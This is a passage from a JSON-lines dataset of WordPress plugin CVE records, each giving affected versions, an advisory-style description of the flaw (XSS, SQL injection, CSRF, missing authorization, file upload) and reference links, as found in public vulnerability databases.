{"CVE_ID":"CVE-2023-3601","slug":"simple-author-box","versionEndExcluding":"2.52","description":"The Simple Author Box WordPress plugin before 2.52 does not verify a user ID before outputting information about that user, leading to arbitrary user information disclosure to users with a role as low as Contributor.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0cc513e-c306-4920-9afb-e33d95a7292f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0cc513e-c306-4920-9afb-e33d95a7292f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36698","slug":"security-malware-firewall","versionImpact":"2.50","versionEndExcluding":"2.51","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized user interaction in versions up to, and including, 2.50. This is due to missing capability checks on several AJAX actions and nonce disclosure in the source page of the administrative dashboard. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to call functions and delete and\/or upload files.","recommendation":"Update to version 2.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-fixed-in-security-malware-scan-by-cleantalk-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-fixed-in-security-malware-scan-by-cleantalk-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23960f42-dfc1-4951-9169-02d889283f01\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23960f42-dfc1-4951-9169-02d889283f01\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb9b039-eb04-4c27-89eb-1932c9c31962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb9b039-eb04-4c27-89eb-1932c9c31962?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0548","slug":"namaste-lms","versionEndExcluding":"2.5.9.4","description":"The Namaste! LMS WordPress plugin before 2.5.9.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6c1ed7a-5b2d-4985-847d-56586b1aae9b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6c1ed7a-5b2d-4985-847d-56586b1aae9b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13477","slug":"ltl-freight-quotes-unishippers-edition","versionImpact":"2.5.8","versionEndExcluding":"2.5.9","description":"The LTL Freight Quotes \u2013 Unishippers Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 2.5.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-unishippers-edition\\\/trunk\\\/shipping-rules\\\/shipping-rules-save.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-unishippers-edition\\\/trunk\\\/shipping-rules\\\/shipping-rules-save.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237773\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237773\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df452c9-4e73-40d7-88a3-d38ae1309d8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df452c9-4e73-40d7-88a3-d38ae1309d8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0948","slug":"woocommerce-for-japan","versionEndExcluding":"2.5.8","description":"The Japanized For WooCommerce WordPress plugin before 2.5.8 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a78d75b2-85a0-41eb-9720-c726ca2e8718\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a78d75b2-85a0-41eb-9720-c726ca2e8718\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11326","slug":"campaign-monitor-wp","versionImpact":"2.5.7","versionEndExcluding":"2.5.8","description":"The Campaign Monitor Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198560\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198560\\\/campaign-monitor-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ebb2ad-91a8-4a0d-ba91-f417943545b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95ebb2ad-91a8-4a0d-ba91-f417943545b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11325","slug":"aweber-wp","versionImpact":"2.5.7","versionEndExcluding":"2.5.8","description":"The AWeber Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php#L353\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198559\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198559\\\/aweber-wp\\\/trunk\\\/includes\\\/eoi-subscribers.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21c09207-38a1-47ae-ae1e-52f8eea4785d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21c09207-38a1-47ae-ae1e-52f8eea4785d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3178","slug":"post-smtp","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability delete arbitrary logs via a CSRF attack.","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5341cb5d-d204-49e1-b013-f8959461995f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5341cb5d-d204-49e1-b013-f8959461995f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25715","slug":"gamipress","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"Missing Authorization vulnerability in GamiPress GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n\/a through 2.5.6.","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gamipress\\\/wordpress-gamipress-plugin-2-5-6-missing-authorization-leading-to-points-manipulation-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gamipress\\\/wordpress-gamipress-plugin-2-5-6-missing-authorization-leading-to-points-manipulation-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3179","slug":"post-smtp","versionEndExcluding":"2.5.7","description":"The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability resend an email to an arbitrary address (for example a password reset email could be resent to an attacker controlled email, and allow them to take over an account).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/542caa40-b199-4397-90bb-4fdb693ebb24\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/542caa40-b199-4397-90bb-4fdb693ebb24\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4004","slug":"advanced-cron-manager","versionImpact":"2.5.6","versionEndExcluding":"2.5.7","description":"The Advanced Cron Manager WordPress plugin before 2.5.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e5e7040-b824-4af7-90a1-90801d12abb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e5e7040-b824-4af7-90a1-90801d12abb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"wp-coder","versionEndExcluding":"2.5.6","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5098","slug":"campaign-monitor-wp","versionImpact":"2.5.5","versionEndExcluding":"2.5.6","description":"The Campaign Monitor Forms by Optin Cat WordPress plugin before 2.5.6 does not prevent users with low privileges (like subscribers) from overwriting any options on a site with the string \"true\", which could lead to a variety of outcomes, including DoS.","recommendation":"Update to version 2.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3167a83c-291e-4372-a42e-d842205ba722\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3167a83c-291e-4372-a42e-d842205ba722\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4420","slug":"sell-media","versionEndExcluding":"2.5.6","description":"The Sell Media plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.5.5. This is due to missing or incorrect nonce validation on the sell_media_process() function. This makes it possible for unauthenticated attackers to sell media paypal orders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da4592b6-5e84-4a89-9ade-6cc227740d32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/da4592b6-5e84-4a89-9ade-6cc227740d32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2603629%40sell-media&new=2603629%40sell-media&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2603629%40sell-media&new=2603629%40sell-media&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5173","slug":"ht-mega-for-elementor","versionImpact":"2.5.5","versionEndExcluding":"2.5.6","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.3\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.5.3\\\/includes\\\/widgets\\\/htmega_videoplayer.php#L549\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5501","slug":"supreme-modules-for-divi","versionImpact":"2.5.51","versionEndExcluding":"2.5.52","description":"The Supreme Modules Lite \u2013 Divi Theme, Extra Theme and Divi Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018button_one_id\u2019 parameter in all versions up to, and including, 2.5.51 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543e6e2-e052-466e-ad19-656fd8d01805?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543e6e2-e052-466e-ad19-656fd8d01805?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/Buttons\\\/Buttons.php#L1889\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/Buttons\\\/Buttons.php#L1889\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095671\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3095671\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4334","slug":"supreme-modules-for-divi","versionImpact":"2.5.3","versionEndExcluding":"2.5.4","description":"The Supreme Modules Lite \u2013 Divi Theme, Extra Theme and Divi Builder plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via the \u2018typing_cursor\u2019 parameter in versions up to, and including, 2.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17508063-3cd7-4b61-b7be-23a71b75f6a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17508063-3cd7-4b61-b7be-23a71b75f6a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/TypingEffect.php#L744\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/TypingEffect.php#L744\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/frontend.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supreme-modules-for-divi\\\/trunk\\\/includes\\\/modules\\\/TypingEffect\\\/frontend.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079965\\\/#file204\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0232","slug":"woolentor-addons","versionEndExcluding":"2.5.4","description":"The ShopLentor WordPress plugin before 2.5.4 unserializes user input from cookies in order to track viewed products and user data, which could lead to PHP Object Injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1885a708-0e8a-4f4c-8e26-069bebe9a518\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1885a708-0e8a-4f4c-8e26-069bebe9a518\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2852711\\\/woolentor-addons\\\/trunk\\\/includes\\\/helper-function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2852711\\\/woolentor-addons\\\/trunk\\\/includes\\\/helper-function.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0231","slug":"woolentor-addons","versionEndExcluding":"2.5.4","description":"The ShopLentor WordPress plugin before 2.5.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/533c19d5-219c-4389-a8bf-8b3a35b33b20\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/533c19d5-219c-4389-a8bf-8b3a35b33b20\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1762","slug":"event-tickets-with-ticket-scanner","versionImpact":"2.5.3","versionEndExcluding":"2.5.4","description":"The Event Tickets with Ticket Scanner WordPress plugin before 2.5.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 2.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5cefdee-2ba0-465d-b176-0dff39fc322c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7721","slug":"html5-video-player","versionImpact":"2.5.34","versionEndExcluding":"2.5.35","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_password' function in all versions up to, and including, 2.5.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to set any options that are not explicitly checked as false to an array, including enabling user registration if it has been disabled.","recommendation":"Update to version 2.5.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc3f308-d1e1-430b-bccd-168c0972fe7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148088\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148088\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7727","slug":"html5-video-player","versionImpact":"2.5.32","versionEndExcluding":"2.5.33","description":"The HTML5 Video Player \u2013 mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple functions called via the 'h5vp_ajax_handler' ajax action in all versions up to, and including, 2.5.32. This makes it possible for unauthenticated attackers to call these functions to manipulate data.","recommendation":"Update to version 2.5.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/908df18e-7178-4d40-becb-86e1a714a7da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/908df18e-7178-4d40-becb-86e1a714a7da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/ImportData.php#L4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/ImportData.php#L4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/html5-video-player\\\/trunk\\\/inc\\\/Model\\\/Ajax.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139559\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139559\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10138","slug":"work-the-flow-file-upload","versionImpact":"2.5.2","versionEndExcluding":"2.5.3","description":"The Work The Flow File Upload plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the jQuery-File-Upload-9.5.0 server and test files in versions up to, and including, 2.5.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 2.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131294\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131294\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131512\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/131512\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127456%40work-the-flow-file-upload&new=1127456%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127456%40work-the-flow-file-upload&new=1127456%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127457%40work-the-flow-file-upload&new=1127457%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1127457%40work-the-flow-file-upload&new=1127457%40work-the-flow-file-upload&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a49a81a9-3d4b-4c8d-b719-fc513aceecc6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a49a81a9-3d4b-4c8d-b719-fc513aceecc6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-work-the-flow-file-upload-arbitrary-file-upload-2-5-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-work-the-flow-file-upload-arbitrary-file-upload-2-5-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\/04\\\/04\\\/wordpress-work-the-flow-file-upload-vulnerability\\\/\",\"name\":\"https:\\\/\\\/www.homelab.it\\\/index.php\\\/2015\\\